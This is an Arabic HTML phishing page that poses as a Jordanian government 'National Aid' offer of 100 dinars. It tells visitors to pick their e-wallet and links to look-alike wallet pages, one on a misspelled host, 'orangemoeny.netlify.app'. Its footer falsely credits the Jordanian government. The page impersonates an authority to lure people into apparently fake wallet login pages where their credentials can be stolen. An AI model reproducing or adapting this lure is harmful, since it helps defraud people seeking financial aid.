<!DOCTYPE html>
<html lang="ar">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="csrf-token" content="RQktravBpGn4uHMq4r0cM4WA8QZ4HeOq26zJkgqM">
    <meta property="og:image" content="https://www2.0zz0.com/2025/05/04/15/360979003.jpeg">
    <meta property="og:site_name" content="مبلغ مقدم للجميع">
    <meta property="og:description" content="على المحفظة الالكترونية">

    <title>احصل على مبلغ بقيمة 100 دينار</title>

    <link rel="dns-prefetch" href="http://fonts.gstatic.com/">
    <link href="https://fonts.googleapis.com/css2?family=Droid+Arabic+Kufi:wght@400;700&display=swap" rel="stylesheet">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css" integrity="sha384-rbsA2VBKQhggwzxH7pPCaAqO46MgnOM80zW1RWuH61DGLwZJEdK2Kadq2F9CUG65" crossorigin="anonymous">
    <link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/>

    <style>
        * {
            direction: rtl;
            font-family: 'Droid Arabic Kufi', sans-serif;
        }

        body {
            background-color: #FFF;
            text-align: center;
        }

        .logo-container {
            margin-top: 20px;
            margin-bottom: 20px;
        }

        .logo-container img {
            width: 150px;
            height: auto;
        }

        .image-container {
            display: flex;
            flex-direction: column;
            align-items: center;
            gap: 20px;
            margin-top: 20px;
        }

        .image-container img {
            width: 200px;
            height: auto;
            cursor: pointer;
            border: 4px solid #FF4500; /* برتقالي */
            border-radius: 15px;
            box-shadow: 0px 4px 6px rgba(0, 0, 0, 0.1);
            transition: transform 0.3s ease, box-shadow 0.3s ease;
        }

        .image-container img:hover {
            transform: scale(1.1);
            box-shadow: 0px 8px 12px rgba(0, 0, 0, 0.2);
        }

        footer {
            margin-top: 50px;
            background-color: #FF4500; /* برتقالي */
            width: 100%;
            bottom: 0px;
            padding: 10px;
            color: #FFF;
            font-weight: bold;
        }

        footer small {
            font-size: 14px;
            color: #FFF;
            font-weight: bolder;
        }

        h1 {
            font-size: 18px; /* تصغير النص */
        }
    </style>
</head>

<body>
    <div class="logo-container">
        <img src="https://www2.0zz0.com/2025/04/30/19/130700301.jpeg" alt="لوجو">
    </div>

    <h1>قدم طلبك الان للمعونة الوطنية - اختر نوع محفظتك</h1>
    <div class="image-container">
        <a href="https://orangemoeny.netlify.app" target="_blank">
            <img src="https://www2.0zz0.com/2025/04/30/19/279371181.png" alt="صورة 1">
        </a>
        <a href="zain.html" target="_blank">
            <img src="https://www2.0zz0.com/2025/04/30/19/194189406.png" alt="صورة 2">
        </a>
        <a href="uwallet.html" target="_blank">
            <img src="https://www2.0zz0.com/2025/04/30/19/823407559.png" alt="صورة 3">
        </a>
    </div>

    <footer>
        <small>© 2025 جميع الحقوق محفوظة لـلحكومة الأردنية</small>
    </footer>
</body>

</html>
